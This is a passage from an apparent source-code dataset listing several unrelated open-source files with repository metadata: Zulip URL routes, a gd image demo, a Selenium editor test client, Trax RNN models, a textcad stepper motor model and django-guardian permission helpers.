HEAD returns whether stream exists (200 or 404) url(r'^streams/(?P<stream_id>\d+)/members$', rest_dispatch, {'GET': 'zerver.views.streams.get_subscribers_backend'}), url(r'^streams/(?P<stream_id>\d+)$', rest_dispatch, {'PATCH': 'zerver.views.streams.update_stream_backend', 'DELETE': 'zerver.views.streams.deactivate_stream_backend'}), # Delete topic in stream url(r'^streams/(?P<stream_id>\d+)/delete_topic$', rest_dispatch, {'POST': 'zerver.views.streams.delete_in_topic'}), url(r'^default_streams$', rest_dispatch, {'POST': 'zerver.views.streams.add_default_stream', 'DELETE': 'zerver.views.streams.remove_default_stream'}), url(r'^default_stream_groups/create$', rest_dispatch, {'POST': 'zerver.views.streams.create_default_stream_group'}), url(r'^default_stream_groups/(?P<group_id>\d+)$', rest_dispatch, {'PATCH': 'zerver.views.streams.update_default_stream_group_info', 'DELETE': 'zerver.views.streams.remove_default_stream_group'}), url(r'^default_stream_groups/(?P<group_id>\d+)/streams$', rest_dispatch, {'PATCH': 'zerver.views.streams.update_default_stream_group_streams'}), # GET lists your streams, POST bulk adds, PATCH bulk modifies/removes url(r'^users/me/subscriptions$', rest_dispatch, {'GET': 'zerver.views.streams.list_subscriptions_backend', 'POST': 'zerver.views.streams.add_subscriptions_backend', 'PATCH': 'zerver.views.streams.update_subscriptions_backend', 'DELETE': 'zerver.views.streams.remove_subscriptions_backend'}), # muting -> zerver.views.muting url(r'^users/me/subscriptions/muted_topics$', rest_dispatch, {'PATCH': 'zerver.views.muting.update_muted_topic'}), # used to register for an event queue in tornado url(r'^register$', rest_dispatch, {'POST': 'zerver.views.events_register.events_register_backend'}), # events -> zerver.tornado.views url(r'^events$', rest_dispatch, {'GET': 'zerver.tornado.views.get_events', 'DELETE': 'zerver.tornado.views.cleanup_event_queue'}), # report -> zerver.views.report # # These endpoints are for internal error/performance reporting # from the browser to the webapp, and we don't expect to ever # include in our API documentation. url(r'^report/error$', rest_dispatch, # Logged-out browsers can hit this endpoint, for portico page JS exceptions. {'POST': ('zerver.views.report.report_error', {'allow_anonymous_user_web', 'intentionally_undocumented'})}), url(r'^report/send_times$', rest_dispatch, {'POST': ('zerver.views.report.report_send_times', {'intentionally_undocumented'})}), url(r'^report/narrow_times$', rest_dispatch, {'POST': ('zerver.views.report.report_narrow_times', {'intentionally_undocumented'})}), url(r'^report/unnarrow_times$', rest_dispatch, {'POST': ('zerver.views.report.report_unnarrow_times', {'intentionally_undocumented'})}), # Used to generate a Zoom video call URL url(r'^calls/create$', rest_dispatch, {'GET': 'zerver.views.video_calls.get_zoom_url'}), # Used for public-only realm exporting url(r'^export/realm$', rest_dispatch, {'POST': 'zerver.views.public_export.public_only_realm_export'}), ] # These views serve pages (HTML). As such, their internationalization # must depend on the url. # # If you're adding a new page to the website (as opposed to a new # endpoint for use by code), you should add it here. i18n_urls = [ url(r'^$', zerver.views.home.home, name='zerver.views.home.home'), # We have a desktop-specific landing page in case we change our / # to not log in in the future. We don't want to require a new # desktop app build for everyone in that case url(r'^desktop_home/$', zerver.views.home.desktop_home, name='zerver.views.home.desktop_home'), url(r'^accounts/login/sso/$', zerver.views.auth.remote_user_sso, name='login-sso'), url(r'^accounts/login/jwt/$', zerver.views.auth.remote_user_jwt, name='login-jwt'), url(r'^accounts/login/social/([\w,-]+)$', zerver.views.auth.start_social_login, name='login-social'), url(r'^accounts/register/social/([\w,-]+)$', zerver.views.auth.start_social_signup, name='signup-social'), url(r'^accounts/login/google/$', zerver.views.auth.start_google_oauth2, name='zerver.views.auth.start_google_oauth2'), url(r'^accounts/login/google/send/$', zerver.views.auth.send_oauth_request_to_google, name='zerver.views.auth.send_oauth_request_to_google'), url(r'^accounts/login/google/done/$', zerver.views.auth.finish_google_oauth2, name='zerver.views.auth.finish_google_oauth2'), url(r'^accounts/login/subdomain/([^/]+)$', zerver.views.auth.log_into_subdomain, name='zerver.views.auth.log_into_subdomain'), url(r'^accounts/login/local/$', zerver.views.auth.dev_direct_login, name='zerver.views.auth.dev_direct_login'), # We have two entries for accounts/login; only the first one is # used for URL resolution. The second here is to allow # reverse("django.contrib.auth.views.login") in templates to # return `/accounts/login/`. url(r'^accounts/login/', zerver.views.auth.login_page, {'template_name': 'zerver/login.html'}, name='zerver.views.auth.login_page'), url(r'^accounts/login/', login, {'template_name': 'zerver/login.html'}, name='django.contrib.auth.views.login'), url(r'^accounts/logout/', zerver.views.auth.logout_then_login, name='zerver.views.auth.logout_then_login'), url(r'^accounts/webathena_kerberos_login/', zerver.views.zephyr.webathena_kerberos_login, name='zerver.views.zephyr.webathena_kerberos_login'), url(r'^accounts/password/reset/$', zerver.views.auth.password_reset, name='zerver.views.auth.password_reset'), url(r'^accounts/password/reset/done/$', password_reset_done, {'template_name': 'zerver/reset_emailed.html'}), url(r'^accounts/password/reset/(?P<uidb64>[0-9A-Za-z]+)/(?P<token>.+)/$', password_reset_confirm, {'post_reset_redirect': '/accounts/password/done/', 'template_name': 'zerver/reset_confirm.html', 'set_password_form': zerver.forms.LoggingSetPasswordForm}, name='django.contrib.auth.views.password_reset_confirm'), url(r'^accounts/password/done/$', password_reset_complete, {'template_name': 'zerver/reset_done.html'}), url(r'^accounts/deactivated/', zerver.views.auth.show_deactivation_notice, name='zerver.views.auth.show_deactivation_notice'), # Displays digest email content in browser. url(r'^digest/$', zerver.views.digest.digest_page), # Registration views, require a confirmation ID. url(r'^accounts/home/', zerver.views.registration.accounts_home, name='zerver.views.registration.accounts_home'), url(r'^accounts/send_confirm/(?P<email>[\S]+)?', TemplateView.as_view(template_name='zerver/accounts_send_confirm.html'), name='signup_send_confirm'), url(r'^accounts/new/send_confirm/(?P<email>[\S]+)?', TemplateView.as_view(template_name='zerver/accounts_send_confirm.html'), {'realm_creation': True}, name='new_realm_send_confirm'), url(r'^accounts/register/', zerver.views.registration.accounts_register, name='zerver.views.registration.accounts_register'), url(r'^accounts/do_confirm/(?P<confirmation_key>[\w]+)', zerver.views.registration.check_prereg_key_and_redirect, name='check_prereg_key_and_redirect'), url(r'^accounts/confirm_new_email/(?P<confirmation_key>[\w]+)', zerver.views.user_settings.confirm_email_change, name='zerver.views.user_settings.confirm_email_change'), # Email unsubscription endpoint. Allows for unsubscribing from various types of emails, # including the welcome emails (day 1 & 2), missed PMs, etc. url(r'^accounts/unsubscribe/(?P<email_type>[\w]+)/(?P<confirmation_key>[\w]+)', zerver.views.unsubscribe.email_unsubscribe, name='zerver.views.unsubscribe.email_unsubscribe'), # Portico-styled page used to provide email confirmation of terms acceptance. url(r'^accounts/accept_terms/$', zerver.views.home.accounts_accept_terms, name='zerver.views.home.accounts_accept_terms'), # Find your account url(r'^accounts/find/$', zerver.views.registration.find_account, name='zerver.views.registration.find_account'), # Go to organization subdomain url(r'^accounts/go/$', zerver.views.registration.realm_redirect, name='zerver.views.registration.realm_redirect'), # Realm Creation url(r'^new/$', zerver.views.registration.create_realm, name='zerver.views.create_realm'), url(r'^new/(?P<creation_key>[\w]+)$', zerver.views.registration.create_realm, name='zerver.views.create_realm'), # Realm Reactivation url(r'^reactivate/(?P<confirmation_key>[\w]+)', zerver.views.realm.realm_reactivation, name='zerver.views.realm.realm_reactivation'), # Global public streams (Zulip's way of doing archives) url(r'^archive/streams/(?P<stream_id>\d+)/topics/(?P<topic_name>[^/]+)$', zerver.views.archive.archive, name='zerver.views.archive.archive'), url(r'^archive/streams/(?P<stream_id>\d+)/topics$', zerver.views.archive.get_web_public_topics_backend, name='zerver.views.archive.get_web_public_topics_backend'), # Login/registration url(r'^register/$', zerver.views.registration.accounts_home, name='register'), url(r'^login/$', zerver.views.auth.login_page, {'template_name': 'zerver/login.html'}, name='zerver.views.auth.login_page'), url(r'^join/(?P<confirmation_key>\S+)/$', zerver.views.registration.accounts_home_from_multiuse_invite, name='zerver.views.registration.accounts_home_from_multiuse_invite'), # API and integrations documentation url(r'^integrations/doc-html/(?P<integration_name>[^/]*)$', zerver.views.documentation.integration_doc, name="zerver.views.documentation.integration_doc"), url(r'^integrations/(.*)', IntegrationView.as_view()), url(r'^team/$', zerver.views.users.team_view), url(r'^history/$', TemplateView.as_view(template_name='zerver/history.html')), url(r'^apps/(.*)', zerver.views.home.apps_view, name='zerver.views.home.apps_view'), url(r'^plans/$', zerver.views.home.plans_view, name='plans'), # Landing page, features pages, signup form, etc. url(r'^hello/$', TemplateView.as_view(template_name='zerver/hello.html', get_context_data=latest_info_context), name='landing-page'), url(r'^new-user/$', RedirectView.as_view(url='/hello', permanent=True)), url(r'^features/$', TemplateView.as_view(template_name='zerver/features.html')), url(r'^why-zulip/$', TemplateView.as_view(template_name='zerver/why-zulip.html')), url(r'^for/open-source/$', TemplateView.as_view(template_name='zerver/for-open-source.html')), url(r'^for/companies/$', TemplateView.as_view(template_name='zerver/for-companies.html')), url(r'^for/working-groups-and-communities/$', TemplateView.as_view(template_name='zerver/for-working-groups-and-communities.html')), url(r'^for/mystery-hunt/$', TemplateView.as_view(template_name='zerver/for-mystery-hunt.html')), url(r'^security/$', TemplateView.as_view(template_name='zerver/security.html')), url(r'^atlassian/$', TemplateView.as_view(template_name='zerver/atlassian.html')), # Terms of Service and privacy pages. url(r'^terms/$', TemplateView.as_view(template_name='zerver/terms.html'), name='terms'), url(r'^privacy/$', TemplateView.as_view(template_name='zerver/privacy.html'), name='privacy'), url(r'^config-error/google$', TemplateView.as_view( template_name='zerver/config_error.html',), {'google_error': True},), url(r'^config-error/github$', TemplateView.as_view( template_name='zerver/config_error.html',), {'github_error': True},), url(r'^config-error/smtp$', TemplateView.as_view( template_name='zerver/config_error.html',), {'smtp_error': True},), url(r'^config-error/ldap$', TemplateView.as_view( template_name='zerver/config_error.html',), {'ldap_error_realm_is_none': True}, name='ldap_error_realm_is_none'), url(r'^config-error/dev$', TemplateView.as_view( template_name='zerver/config_error.html',), {'dev_not_supported_error': True}, name='dev_not_supported'), ] # Make a copy of i18n_urls so that they appear without prefix for english urls = list(i18n_urls) # Include the dual-use patterns twice urls += [ url(r'^api/v1/', include(v1_api_and_json_patterns)), url(r'^json/', include(v1_api_and_json_patterns)), ] # user_uploads -> zerver.views.upload.serve_file_backend # # This url is an exception to the url naming schemes for endpoints. It # supports both API and session cookie authentication, using a single # URL for both (not 'api/v1/' or 'json/' prefix). This is required to # easily support the mobile apps fetching uploaded files without # having to rewrite URLs, and is implemented using the # 'override_api_url_scheme' flag passed to rest_dispatch urls += [ url(r'^user_uploads/(?P<realm_id_str>(\d*|unk))/(?P<filename>.*)', rest_dispatch, {'GET': ('zerver.views.upload.serve_file_backend', {'override_api_url_scheme'})}), # This endpoint serves thumbnailed versions of images using thumbor; # it requires an exception for the same reason. url(r'^thumbnail', rest_dispatch, {'GET': ('zerver.views.thumbnail.backend_serve_thumbnail', {'override_api_url_scheme'})}), # Avatars have the same constraint due to `!avatar` syntax. url(r'^avatar/(?P<email_or_id>[\S]+)/(?P<medium>[\S]+)?', rest_dispatch, {'GET': ('zerver.views.users.avatar', {'override_api_url_scheme'})}), url(r'^avatar/(?P<email_or_id>[\S]+)', rest_dispatch, {'GET': ('zerver.views.users.avatar', {'override_api_url_scheme'})}), ] # This url serves as a way to recieve CSP violation reports from the users. # We use this endpoint to just log these reports. urls += url(r'^report/csp_violations$', zerver.views.report.report_csp_violations, name='zerver.views.report.report_csp_violations'), # This url serves as a way to provide backward compatibility to messages # rendered at the time Zulip used camo for doing http -> https conversion for # such links with images previews. Now thumbor can be used for serving such # images. urls += url(r'^external_content/(?P<digest>[\S]+)/(?P<received_url>[\S]+)', zerver.views.camo.handle_camo_url, name='zerver.views.camo.handle_camo_url'), # Incoming webhook URLs # We don't create urls for particular git integrations here # because of generic one below for incoming_webhook in WEBHOOK_INTEGRATIONS: if incoming_webhook.url_object: urls.append(incoming_webhook.url_object) # Desktop-specific authentication URLs urls += [ url(r'^json/fetch_api_key$', rest_dispatch, {'POST': 'zerver.views.auth.json_fetch_api_key'}), ] # Mobile-specific authentication URLs urls += [ # This json format view used by the mobile apps lists which # authentication backends the server allows as well as details # like the requested subdomains'd realm icon (if known) and # server-specific compatibility. url(r'^api/v1/server_settings', zerver.views.auth.api_get_server_settings), # This is a deprecated old version of api/v1/server_settings that only returns auth backends. url(r'^api/v1/get_auth_backends', zerver.views.auth.api_get_auth_backends, name='zerver.views.auth.api_get_auth_backends'), # Used as a global check by all mobile clients, which currently send # requests to https://zulipchat.com/compatibility almost immediately after # starting up. url(r'^compatibility$', zerver.views.compatibility.check_global_compatibility), # This json format view used by the mobile apps accepts a username # password/pair and returns an API key. url(r'^api/v1/fetch_api_key$', zerver.views.auth.api_fetch_api_key, name='zerver.views.auth.api_fetch_api_key'), # This is for the signing in through the devAuthBackEnd on mobile apps. url(r'^api/v1/dev_fetch_api_key$', zerver.views.auth.api_dev_fetch_api_key, name='zerver.views.auth.api_dev_fetch_api_key'), # This is for fetching the emails of the admins and the users. url(r'^api/v1/dev_list_users$', zerver.views.auth.api_dev_list_users, name='zerver.views.auth.api_dev_list_users'), # Used to present the GOOGLE_CLIENT_ID to mobile apps url(r'^api/v1/fetch_google_client_id$', zerver.views.auth.api_fetch_google_client_id, name='zerver.views.auth.api_fetch_google_client_id'), ] # View for uploading messages from email mirror urls += [ url(r'^email_mirror_message$', zerver.views.email_mirror.email_mirror_message, name='zerver.views.email_mirror.email_mirror_message'), ] # Include URL configuration files for site-specified extra installed # Django apps for app_name in settings.EXTRA_INSTALLED_APPS: app_dir = os.path.join(settings.DEPLOY_ROOT, app_name) if os.path.exists(os.path.join(app_dir, 'urls.py')): urls += [url(r'^', include('%s.urls' % (app_name,)))] i18n_urls += import_string("{}.urls.i18n_urlpatterns".format(app_name)) # Tornado views urls += [ # Used internally for communication between Django and Tornado processes url(r'^notify_tornado$', zerver.tornado.views.notify, name='zerver.tornado.views.notify'), url(r'^api/v1/events/internal$', zerver.tornado.views.get_events_internal), ] # Python Social Auth urls += [url(r'^', include('social_django.urls', namespace='social'))] # User documentation site urls += [url(r'^help/(?P<article>.*)$', MarkdownDirectoryView.as_view(template_name='zerver/documentation_main.html', path_template='/zerver/help/%s.md'))] urls += [url(r'^api/(?P<article>[-\w]*\/?)$', MarkdownDirectoryView.as_view(template_name='zerver/documentation_main.html', path_template='/zerver/api/%s.md'))] # Two Factor urls if settings.TWO_FACTOR_AUTHENTICATION_ENABLED: urls += [url(r'', include(tf_urls)), url(r'', include(tf_twilio_urls))] if settings.DEVELOPMENT: urls += dev_urls.urls i18n_urls += dev_urls.i18n_urls # The sequence is important; if i18n urls don't come first then # reverse url mapping points to i18n urls which causes the frontend # tests to fail urlpatterns = i18n_patterns(*i18n_urls) + urls + legacy_urls def handler400(request: HttpRequest, exception: Exception) -> HttpResponse: # (This workaround should become obsolete with Django 2.1; the # issue was fixed upstream in commit 7ec0fdf62 on 2018-02-14.) # # This behaves exactly like the default Django implementation in # the case where you haven't made a template "400.html", which we # haven't -- except that it doesn't call `@requires_csrf_token` to # attempt to set a `csrf_token` variable that the template could # use if there were a template. We skip @requires_csrf_token # because that codepath can raise an error on a bad request, which # is exactly the case we're trying to handle when we get here. # Bug filed upstream: https://code.djangoproject.com/ticket/28693 # # This function is used just because it has this special name in # the root urls.py file; for more details, see: # https://docs.djangoproject.com/en/1.11/topics/http/views/#customizing-error-views return HttpResponseBadRequest( '<h1>Bad Request (400)</h1>', content_type='text/html')
apache-2.0
-2,487,553,262,072,114,000
47.75
103
0.668238
false
Solomoriah/gdmodule
demo/gddemo.py
1
1024
#!/usr/bin/env python import gd, os, cStringIO, urllib2 os.environ["GDFONTPATH"] = "." FONT = "Pacifico" def simple(): im = gd.image((200, 200)) white = im.colorAllocate((255, 255, 255)) black = im.colorAllocate((0, 0, 0)) red = im.colorAllocate((255, 0, 0)) blue = im.colorAllocate((0, 0, 255)) im.colorTransparent(white) im.interlace(1) im.rectangle((0,0),(199,199),black) im.arc((100,100),(195,175),0,360,blue) im.fill((100,100),red) print im.get_bounding_rect(FONT, 12.0, 0.0, (10, 100), "Hello Python") im.string_ttf(FONT, 20.0, 0.0, (10, 100), "Hello Python", black) f=open("xx.png","w") im.writePng(f) f.close() f=open("xx.jpg", "w") im.writeJpeg(f,100) f.close() f=cStringIO.StringIO() im.writePng(f) print "PNG size:", len(f.getvalue()) f.close() f = urllib2.urlopen("http://www.gnu.org/graphics/gnu-head-sm.jpg") im = gd.image(f, "jpg") f.close() print "GNU Image Size:", im.size() simple()
bsd-3-clause
8,312,121,099,719,976,000
20.787234
74
0.583008
false
quentinl-c/network_testing-client
app/editor.py
1
2631
from collaborator import Collaborator import os import random import logging import time logging.basicConfig(filename=__name__ + '.log', level=logging.DEBUG) logger = logging.getLogger(__name__) HOME_DIR = os.getenv('HOME_DIR', '/home/') WRITER_SELECTOR = 'ace_text-input' READER_SELECTOR = 'ace_content' FILTER = '[Tracker]' tempo = 15 # Client will wait 20 secondes befores getting results class Editor(Collaborator): """docstring for Editor""" def __init__(self, controller, target, typing_speed, word_to_type): Collaborator.__init__(self, controller, target) logger.debug("=== Editor is being instanciated ===") self.word_to_type = None self.counter = 0 if len(word_to_type) > 0: selector = WRITER_SELECTOR self.word_to_type = word_to_type else: selector = READER_SELECTOR self.word_to_type = None self.select = None while self.select is None: self._driver.implicitly_wait(20) self.select = self._driver.find_element_by_class_name( selector) def run(self): self.alive = True if self.word_to_type is not None: beg_time = random.uniform(2.0, 6.0) time.sleep(beg_time) while self.alive: if self.word_to_type is not None: w = ''.join((self.word_to_type, ';', str(self.counter).zfill(6))) self.select.send_keys(w) self.counter += 1 time.sleep(2) else: self.select.text self.saveTxt() def getResults(self): time.sleep(tempo) logger.debug("=== Get results from log files ===") tmp = [] self.alive = False time.sleep(tempo) with open(self._log_path, 'r') as content_file: for line in content_file: beg = line.find(FILTER) if beg != -1: rec = line[beg:].split(',')[0].split('"')[0] tmp.append(rec) content = '\n'.join(tmp) self._controller.sendResults(content) def saveTxt(self): if self.word_to_type is not None: self.select = None while self.select is None: self._driver.implicitly_wait(20) self.select = self._driver.find_element_by_class_name( READER_SELECTOR) content = self.select.text file = open(HOME_DIR + str(self._controller.id) + '_content.txt', 'w') file.write(content) file.close()
gpl-3.0
31,586,578,786,040,000
30.698795
78
0.54618
false
google/trax
trax/models/rnn.py
1
9301
# coding=utf-8 # Copyright 2021 The Trax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """RNNs (recursive neural networks).""" from trax import layers as tl from trax.fastmath import numpy as jnp def RNNLM(vocab_size, d_model=512, n_layers=2, rnn_cell=tl.LSTMCell, rnn_cell_d_state_multiplier=2, dropout=0.1, mode='train'): """Returns an RNN language model. This model performs autoregressive language modeling: - input: rank 2 tensor representing a batch of text strings via token IDs plus padding markers; shape is (batch_size, sequence_length). The tensor elements are integers in `range(vocab_size)`, and `0` values mark padding positions. - output: rank 3 tensor representing a batch of log-probability distributions for each sequence position over possible token IDs; shape is (batch_size, sequence_length, `vocab_size`). Args: vocab_size: Input vocabulary size -- each element of the input tensor should be an integer in `range(vocab_size)`. These integers typically represent token IDs from a vocabulary-based tokenizer. d_model: Embedding depth throughout the model. n_layers: Number of RNN layers. rnn_cell: Type of RNN cell; must be a subclass of `Layer`. rnn_cell_d_state_multiplier: Multiplier for feature depth of RNN cell state. dropout: Stochastic rate (probability) for dropping an activation value when applying dropout. mode: If `'predict'`, use fast inference; if `'train'` apply dropout. Returns: An RNN language model as a layer that maps from a tensor of tokens to activations over a vocab set. """ if n_layers != 2: # TODO(jonni): Remove n_layers arg, if it can't vary? raise ValueError(f'Number of layers must be set to 2; instead got' f' {n_layers}.') def MultiRNNCell(): """Multi-layer RNN cell.""" return tl.Serial( tl.Parallel([], tl.Split(n_items=n_layers)), tl.SerialWithSideOutputs( [rnn_cell(n_units=d_model) for _ in range(n_layers)]), tl.Parallel([], tl.Concatenate(n_items=n_layers)) ) zero_state = tl.MakeZeroState( # pylint: disable=no-value-for-parameter depth_multiplier=n_layers * rnn_cell_d_state_multiplier ) return tl.Serial( tl.ShiftRight(mode=mode), tl.Embedding(vocab_size, d_model), tl.Dropout(rate=dropout, mode=mode), tl.Branch([], zero_state), tl.Scan(MultiRNNCell(), axis=1, mode=mode), tl.Select([0], n_in=2), # Drop RNN state. tl.Dense(vocab_size), ) def GRULM(vocab_size=256, d_model=512, n_layers=1, mode='train'): """Returns a GRU (gated recurrent unit) language model. This model performs autoregressive language modeling: - input: rank 2 tensor representing a batch of text strings via token IDs plus padding markers; shape is (batch_size, sequence_length). The tensor elements are integers in `range(vocab_size)`, and `0` values mark padding positions. - output: rank 3 tensor representing a batch of log-probability distributions for each sequence position over possible token IDs; shape is (batch_size, sequence_length, `vocab_size`). Args: vocab_size: Input vocabulary size -- each element of the input tensor should be an integer in `range(vocab_size)`. These integers typically represent token IDs from a vocabulary-based tokenizer. d_model: Embedding depth throughout the model. n_layers: Number of GRU layers. mode: If `'predict'`, use fast inference (and omit the right shift). Returns: A GRU language model as a layer that maps from a tensor of tokens to activations over a vocab set. """ return tl.Serial( tl.ShiftRight(mode=mode), tl.Embedding(vocab_size, d_model), [tl.GRU(d_model, mode=mode) for _ in range(n_layers)], tl.Dense(vocab_size), ) # TODO(jonni): Decide names (here and Transformer): input/source, output/target # TODO(jonni): Align with Transfomer: (attention-)dropout, n-(attention-)heads def LSTMSeq2SeqAttn(input_vocab_size=256, target_vocab_size=256, d_model=512, n_encoder_layers=2, n_decoder_layers=2, n_attention_heads=1, attention_dropout=0.0, mode='train'): """Returns an LSTM sequence-to-sequence model with attention. This model is an encoder-decoder that performs tokenized string-to-string ("source"-to-"target") transduction: - inputs (2): - source: rank 2 tensor representing a batch of text strings via token IDs plus padding markers; shape is (batch_size, sequence_length). The tensor elements are integers in `range(input_vocab_size)`, and `0` values mark padding positions. - target: rank 2 tensor representing a batch of text strings via token IDs plus padding markers; shape is (batch_size, sequence_length). The tensor elements are integers in `range(output_vocab_size)`, and `0` values mark padding positions. - output: rank 3 tensor representing a batch of log-probability distributions for each sequence position over possible token IDs; shape is (batch_size, sequence_length, `vocab_size`). An example use would be to translate (tokenized) sentences from English to German. The model works as follows: * Input encoder runs on the input tokens and creates activations that are used as both keys and values in attention. * Pre-attention decoder runs on the targets and creates activations that are used as queries in attention. * Attention runs on the queries, keys and values masking out input padding. * Decoder runs on the result, followed by a cross-entropy loss. Args: input_vocab_size: Input vocabulary size -- each element of the input tensor should be an integer in `range(vocab_size)`. These integers typically represent token IDs from a vocabulary-based tokenizer. target_vocab_size: Target vocabulary size. d_model: Final dimension of tensors at most points in the model, including the initial embedding output. n_encoder_layers: Number of LSTM layers in the encoder. n_decoder_layers: Number of LSTM layers in the decoder after attention. n_attention_heads: Number of attention heads. attention_dropout: Stochastic rate (probability) for dropping an activation value when applying dropout within an attention block. mode: If `'predict'`, use fast inference. If `'train'`, each attention block will include dropout; else, it will pass all values through unaltered. Returns: An LSTM sequence-to-sequence model as a layer that maps from a source-target tokenized text pair to activations over a vocab set. """ input_encoder = tl.Serial( tl.Embedding(input_vocab_size, d_model), [tl.LSTM(d_model) for _ in range(n_encoder_layers)], ) pre_attention_decoder = tl.Serial( tl.ShiftRight(mode=mode), tl.Embedding(target_vocab_size, d_model), tl.LSTM(d_model, mode=mode), ) def PrepareAttentionInputs(): """Layer that prepares queries, keys, values and mask for attention.""" def F(encoder_activations, decoder_activations, input_tokens): keys = values = encoder_activations queries = decoder_activations # Mask is 1 where inputs are not padding (0) and 0 where they are padding. mask = (input_tokens != 0) # We need to add axes to the mask for attention heads and decoder length. mask = jnp.reshape(mask, (mask.shape[0], 1, 1, mask.shape[1])) # Broadcast so mask is [batch, 1 for heads, decoder-len, encoder-len]. mask = mask + jnp.zeros((1, 1, decoder_activations.shape[1], 1)) mask = mask.astype(jnp.float32) return queries, keys, values, mask return tl.Fn('PrepareAttentionInputs', F, n_out=4) return tl.Serial( # in-toks, target-toks tl.Select([0, 1, 0, 1]), # in-toks, target-toks, in-toks, target-toks tl.Parallel(input_encoder, pre_attention_decoder), PrepareAttentionInputs(), # q, k, v, mask, target-toks tl.Residual( tl.AttentionQKV(d_model, n_heads=n_attention_heads, dropout=attention_dropout, mode=mode, cache_KV_in_predict=True) ), # decoder-vecs, mask, target-toks tl.Select([0, 2]), # decoder-vecs, target-toks [tl.LSTM(d_model, mode=mode) for _ in range(n_decoder_layers)], tl.Dense(target_vocab_size), tl.LogSoftmax() )
apache-2.0
-1,051,844,559,480,561,700
39.973568
80
0.669498
false
textcad/pyMagpie
magpie/motor.py
1
2154
#!/usr/bin/env python from textcad import * import magpie.utility import magpie.hardware class Stepper(component.Element): def __init__(self, size="GenericNEMA17", negative=False, negativeLength=10): component.Element.__init__(self, name="stepper") self.size = size self.width = 0 self.length = 0 self.mountSpacing = 0 self.mountScrew = "" self.flangeDiameter = 0 self.flangeHeight = 0 self.shaftLength = 0 self.shaftDiameter = 0 self.negative = negative self.negativeLength = negativeLength magpie.utility.get_dimensions(size=size, name="stepperMotor", obj=self) self.holeLocations = [[self.mountSpacing/2, self.mountSpacing/2, 0], [self.mountSpacing/2, -self.mountSpacing/2, 0], [-self.mountSpacing/2, self.mountSpacing/2, 0], [-self.mountSpacing/2, -self.mountSpacing/2, 0]] self.screw = magpie.hardware.CapScrew(size=self.mountScrew) self.location = [0, 0, 0] self.color = [0.5, 0.5, 0.5] self.construction = self._construction() def _construction(self): body = element.Cube([self.width, self.width, self.length]) body.center = [True, True, False] body.location = [0, 0, -self.length] flange = element.Cylinder(radius=self.flangeDiameter/2, height=self.flangeHeight) shaft = element.Cylinder(radius=self.shaftDiameter/2, height=self.shaftLength+self.flangeHeight) asm = body + flange + shaft if self.negative: # Flange asm += element.Hole(radius=self.flangeDiameter/2, height=self.negativeLength) # Mount holes for hole in self.holeLocations: s = element.Hole(radius=self.screw.outerDiameter/2, height=self.negativeLength) s.location = hole asm += s return asm
mit
-7,378,518,400,631,267,000
38.888889
79
0.551532
false
restless/django-guardian
guardian/utils.py
1
4832
""" django-guardian helper functions. Functions defined within this module should be considered as django-guardian's internal functionality. They are **not** guaranteed to be stable - which means they actual input parameters/output type may change in future releases. """ import os import logging from itertools import chain from django.conf import settings from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import PermissionDenied from django.http import HttpResponseForbidden, HttpResponseRedirect from django.shortcuts import render_to_response from django.template import RequestContext, TemplateDoesNotExist from django.utils.http import urlquote from guardian.compat import AnonymousUser from guardian.compat import Group from guardian.compat import User from guardian.conf import settings as guardian_settings from guardian.exceptions import NotUserNorGroup logger = logging.getLogger(__name__) abspath = lambda *p: os.path.abspath(os.path.join(*p)) def get_anonymous_user(): """ Returns ``User`` instance (not ``AnonymousUser``) depending on ``ANONYMOUS_USER_ID`` configuration. """ return User.objects.get(id=guardian_settings.ANONYMOUS_USER_ID) def get_groups_backref_name(): """ Returns backreference name from Group to user model. """ return User._meta.get_field_by_name('groups')[0].related_query_name() def get_identity(identity): """ Returns (user_obj, None) or (None, group_obj) tuple depending on what is given. Also accepts AnonymousUser instance but would return ``User`` instead - it is convenient and needed for authorization backend to support anonymous users. :param identity: either ``User`` or ``Group`` instance :raises ``NotUserNorGroup``: if cannot return proper identity instance **Examples**:: >>> user = User.objects.create(username='joe') >>> get_identity(user) (<User: joe>, None) >>> group = Group.objects.create(name='users') >>> get_identity(group) (None, <Group: users>) >>> anon = AnonymousUser() >>> get_identity(anon) (<User: AnonymousUser>, None) >>> get_identity("not instance") ... NotUserNorGroup: User/AnonymousUser or Group instance is required (got ) """ if isinstance(identity, AnonymousUser): identity = get_anonymous_user() if isinstance(identity, User): return identity, None elif isinstance(identity, Group): return None, identity raise NotUserNorGroup("User/AnonymousUser or Group instance is required " "(got %s)" % identity) def get_403_or_None(request, perms, obj=None, login_url=None, redirect_field_name=None, return_403=False, accept_global_perms=False): login_url = login_url or settings.LOGIN_URL redirect_field_name = redirect_field_name or REDIRECT_FIELD_NAME # Handles both original and with object provided permission check # as ``obj`` defaults to None has_permissions = False # global perms check first (if accept_global_perms) if accept_global_perms: has_permissions = all(request.user.has_perm(perm) for perm in perms) # if still no permission granted, try obj perms if not has_permissions: has_permissions = all(request.user.has_perm(perm, obj) for perm in perms) if not has_permissions: if return_403: if guardian_settings.RENDER_403: try: response = render_to_response( guardian_settings.TEMPLATE_403, {}, RequestContext(request)) response.status_code = 403 return response except TemplateDoesNotExist, e: if settings.DEBUG: raise e elif guardian_settings.RAISE_403: raise PermissionDenied return HttpResponseForbidden() else: path = urlquote(request.get_full_path()) tup = login_url, redirect_field_name, path return HttpResponseRedirect("%s?%s=%s" % tup) def clean_orphan_obj_perms(): """ Seeks and removes all object permissions entries pointing at non-existing targets. Returns number of removed objects. """ from guardian.models import UserObjectPermission from guardian.models import GroupObjectPermission deleted = 0 # TODO: optimise for perm in chain(UserObjectPermission.objects.all(), GroupObjectPermission.objects.all()): if perm.content_object is None: logger.debug("Removing %s (pk=%d)" % (perm, perm.pk)) perm.delete() deleted += 1 logger.info("Total removed orphan object permissions instances: %d" % deleted) return deleted
bsd-2-clause
8,977,540,974,672,123,000
32.324138
81
0.666598
false
hamole/pbl8
pbl8_project/pbl/migrations/0003_auto.py
1
3700
